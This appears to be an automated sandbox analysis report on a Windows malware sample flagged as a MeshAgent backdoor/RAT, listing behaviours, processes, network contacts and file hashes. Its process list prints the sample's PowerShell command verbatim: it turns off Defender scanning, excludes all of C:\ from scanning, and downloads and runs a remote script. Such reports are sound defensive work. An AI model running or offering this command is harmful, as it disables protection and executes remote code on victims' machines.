Malware Analysis Report

2024-10-23 20:15

Sample ID 241016-n55xbssarl
Target 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch
SHA256 54eb6f4d6682a9f61182fef1b6162019fd205710b14fee3719bce58ba9d3bcc6
Tags
upx discovery execution meshagent backdoor persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

54eb6f4d6682a9f61182fef1b6162019fd205710b14fee3719bce58ba9d3bcc6

Threat Level: Known bad

The file 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch was found to be: Known bad.

Malicious Activity Summary

upx discovery execution meshagent backdoor persistence rat trojan

Detects MeshAgent payload

MeshAgent

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Sets service image path in registry

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

Enumerates connected drives

Checks installed software on the system

Drops file in System32 directory

UPX packed file

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious behavior: CmdExeWriteProcessMemorySpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-16 12:00

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-16 11:59

Reported

2024-10-16 12:02

Platform

win7-20240708-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\install.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\install.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2972 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 2740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2412 wrote to memory of 2740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2412 wrote to memory of 2740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2412 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\system32\cmd.exe
PID 2972 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\system32\cmd.exe
PID 2972 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\system32\cmd.exe
PID 2748 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2748 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2748 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2748 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2748 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2748 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2748 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2776 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2776 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2776 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2776 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2776 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2776 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2776 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2684 wrote to memory of 688 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2684 wrote to memory of 688 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2684 wrote to memory of 688 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2684 wrote to memory of 688 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2684 wrote to memory of 688 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2684 wrote to memory of 688 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2684 wrote to memory of 688 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"C:\*\"; CiTool.exe -rp \"{PolicyId GUID}\" -json; powershell -nop -ExecutionPolicy Bypass -c \"Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')\" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -

C:\Windows\System32\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\*

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ExecutionPolicy Bypass -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c install.exe

C:\Users\Admin\AppData\Local\Temp\install.exe

install.exe

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSI96C3.tmp

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 71A874F1A3A05924F5C0B10E1827D917 C

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.logflare.app udp
US 172.67.144.216:443 api.logflare.app tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp

Files

memory/2972-5-0x0000000000DF0000-0x0000000004568000-memory.dmp

memory/2412-9-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

memory/2412-8-0x000000001B760000-0x000000001BA42000-memory.dmp

memory/2412-7-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

memory/2412-6-0x0000000002B40000-0x0000000002BC0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 68ef68415ba57219816065c9af471b99
SHA1 0d027a4abb658610f507c6562b288b04f6b37151
SHA256 9e8d3a55a68c3296389311d8b7d07527b00362655b852ddd05994c75a9e33950
SHA512 baf717e9759ffd35d6c0d153bde17ab8ea4138d5c3ac6bbb1fc5a2c155e678f748459ebeddfeeb5adb4236711b54d422cfe71cd45a23a547f35eabe86d3cd219

memory/2412-20-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/2412-21-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\install.exe

MD5 979ce82b2ea35a92fae6a60c6c3e3791
SHA1 8d260eea0151ee7a6aae88eb2e9015d5efb2603b
SHA256 be86cadf405e9f617601da44bab88f08b3e92ac4349a2616378a9195722925ca
SHA512 ec67c1d20ae0f9fffcf471d60f2ade6e08fd5a0e572ee1b58036ce11c5f353db93b622c795fe013a0dbe91fe4921b5ba50c312b8c51716d5cc4921d2050f2724

C:\Users\Admin\AppData\Local\Temp\MSI96C3.tmp

MD5 6d9b5a3b75da266db5c237b0ac70b7f9
SHA1 9ce4aa208974b299ce0abeaf043740616f4f0b02
SHA256 d57614b838f083937ff98c161e55fa60b5d23de639818ad6eef8335ba23c031b
SHA512 fb458b1c2d3b9da748b1775b1bf2098fbe5076a0bc3daf2a93e1be978e3b7e34bc7a75c2660ef97cac3e7ba23ebceae1785dfe8ac124440f34dbd248cd92571d

C:\Users\Admin\AppData\Local\Temp\MSI9B17.tmp

MD5 684f2d21637cb5835172edad55b6a8d9
SHA1 5eac3b8d0733aa11543248b769d7c30d2c53fcdb
SHA256 da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0
SHA512 7b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c

memory/2412-35-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/2972-36-0x0000000000DF0000-0x0000000004568000-memory.dmp

memory/2972-38-0x0000000000DF0000-0x0000000004568000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-16 11:59

Reported

2024-10-16 12:02

Platform

win10v2004-20241007-en

Max time kernel

142s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"

Signatures

Detects MeshAgent payload

Description Indicator Process Target
N/A N/A N/A N/A

MeshAgent

rat trojan backdoor meshagent

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Microsoft\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\svchost\\svchost.exe\" --meshServiceName=\"Microsoft\"" C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
